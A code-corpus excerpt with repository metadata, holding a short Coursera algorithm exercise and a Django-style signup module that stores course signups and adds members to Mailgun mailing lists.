return os.path.dirname(program)
pypath=find_python()
extend(pypath)
| 3.515625 | 4 |
programming/coursera/algorithmic_toolbox/week_1/MaximumPairwiseProduct.py | vamsitallapudi/Coderefer-Python-Projects | 1 | 12773249 | <filename>programming/coursera/algorithmic_toolbox/week_1/MaximumPairwiseProduct.py
# python3
def max_pairwise_product(numbers):
x = sorted(numbers)
n = len(numbers)
return x[n-1] * x[n-2]
if __name__ == '__main__':
input_n = int(input())
input_numbers = [int(x) for x in input().split()]
print(max_pairwise_product(input_numbers))
| 4.34375 | 4 |
signup/models.py | p2pu/mechanical-mooc | 12 | 12773250 | import random
import string
from datetime import datetime
import json
from signup import db
from signup import emails
from mailgun import api as mailgun_api
from sequence import models as sequence_model
def create_signup( email, questions ):
""" Add signup to the current sequence """
sequence = sequence_model.get_current_sequence_number()
if db.UserSignup.objects.filter(email__iexact=email, sequence=sequence).exists():
raise Exception('Signup already exists')
invite_code=''.join([
random.choice(string.letters+string.digits) for i in range(32)
])
now = datetime.utcnow()
signup = db.UserSignup(
email=email,
invite_code=invite_code,
questions=json.dumps(questions),
sequence=sequence,
date_added=now,
date_updated=now
)
signup.save()
return _signup2json(signup)
def update_signup( email, questions ):
""" Update the signup if it exists for the current sequence. If the signup was previously delete it will be undeleted """
sequence = sequence_model.get_current_sequence_number()
signup_db = db.UserSignup.objects.get(email__iexact=email, sequence=sequence)
old_questions = json.loads(signup_db.questions)
for key, value in questions.items():
old_questions[key] = value
signup_db.questions = json.dumps(old_questions)
signup_db.date_updated = datetime.utcnow()
signup_db.date_deleted = None
signup_db.save()
return _signup2json(signup_db)
def create_or_update_signup( email, questions ):
# check if user is already added to the current sequence
sequence = sequence_model.get_current_sequence_number()
if db.UserSignup.objects.filter(email__iexact=email, sequence=sequence).exists():
return update_signup(email, questions)
else:
return create_signup(email, questions)
def delete_signup( email, sequence ):
if db.UserSignup.objects.filter(email__iexact=email, sequence=sequence, date_deleted__isnull=False).exists():
raise Exception('Signup already deleted')
signup_db = db.UserSignup.objects.get(email__iexact=email, sequence=sequence)
signup_db.date_deleted = datetime.utcnow()
signup_db.save()
def _signup2json( signup_db ):
signup = {
'email': signup_db.email,
'questions': json.loads(signup_db.questions),
'sequence': signup_db.sequence,
'date_created': signup_db.date_added,
'date_updated': signup_db.date_updated,
'date_deleted': signup_db.date_deleted,
'key': signup_db.invite_code
}
return signup
def get_signup( email, sequence ):
if not db.UserSignup.objects.filter(email__iexact=email, sequence=sequence, date_deleted__isnull=True).exists():
raise Exception(u'Signup for {0} not found'.format(email))
signup_db = db.UserSignup.objects.get(email__iexact=email, sequence=sequence, date_deleted__isnull=True)
return _signup2json(signup_db)
def get_all_user_signups( email ):
signups = db.UserSignup.objects.filter(email__iexact=email, date_deleted__isnull=True)
return [ _signup2json(su) for su in signups ]
def get_signup_by_invite_code( invite_code ):
user_set = db.UserSignup.objects.filter(
invite_code=invite_code,
date_deleted__isnull=True
)
if not user_set.exists():
raise Exception()
return _signup2json(user_set[0])
def get_signups( sequence ):
signups = db.UserSignup.objects.filter(date_deleted__isnull=True)
if sequence:
signups = signups.filter(sequence=sequence)
return [_signup2json(signup) for signup in signups]
def get_signups_for_archiving( sequence ):
""" Only use this for archiving."""
sequence = int(sequence)
# TODO this is messy!
signups = db.UserSignup.objects.raw('select distinct on (email) * from signup_usersignup where sequence= '+ str(sequence) +' order by email, date_added DESC;')
return [_signup2json(signup) for signup in signups]
def get_new_signups( ):
""" get signups where the welcome email hasn't been sent yet """
signups = db.UserSignup.objects.filter(date_tasks_handled__isnull=True, date_deleted__isnull=True)
return [_signup2json(signup) for signup in signups]
def handle_new_signups( ):
""" Send welcome email to new users.
Add them to a general mailing list.
Update db when done. """
signups = db.UserSignup.objects.filter(date_tasks_handled__isnull=True, date_deleted__isnull=True)[:500]
while len(signups):
#TODO emails.send_welcome_emails([signup.email for signup in signups])
for signup in signups:
add_user_to_global_list(signup.email, signup.sequence)
#make sure new signups aren't in the mailgun blocked list
mailgun_api.delete_all_unsubscribes(signup.email)
db.UserSignup.objects.filter(id__in=signups.values('id')).update(date_tasks_handled=datetime.utcnow())
signups = db.UserSignup.objects.filter(date_tasks_handled__isnull=True, date_deleted__isnull=True)[:500]
def add_user_to_global_list( email, sequence ):
""" add user to email list that gets all emails """
signup_db = db.UserSignup.objects.get(
email__iexact=email, date_deleted__isnull=True, sequence=sequence
)
if signup_db.sequence:
list_name = sequence_model.sequence_list_name(signup_db.sequence)
mailgun_api.add_list_member(list_name, email)
| 2.71875 | 3 |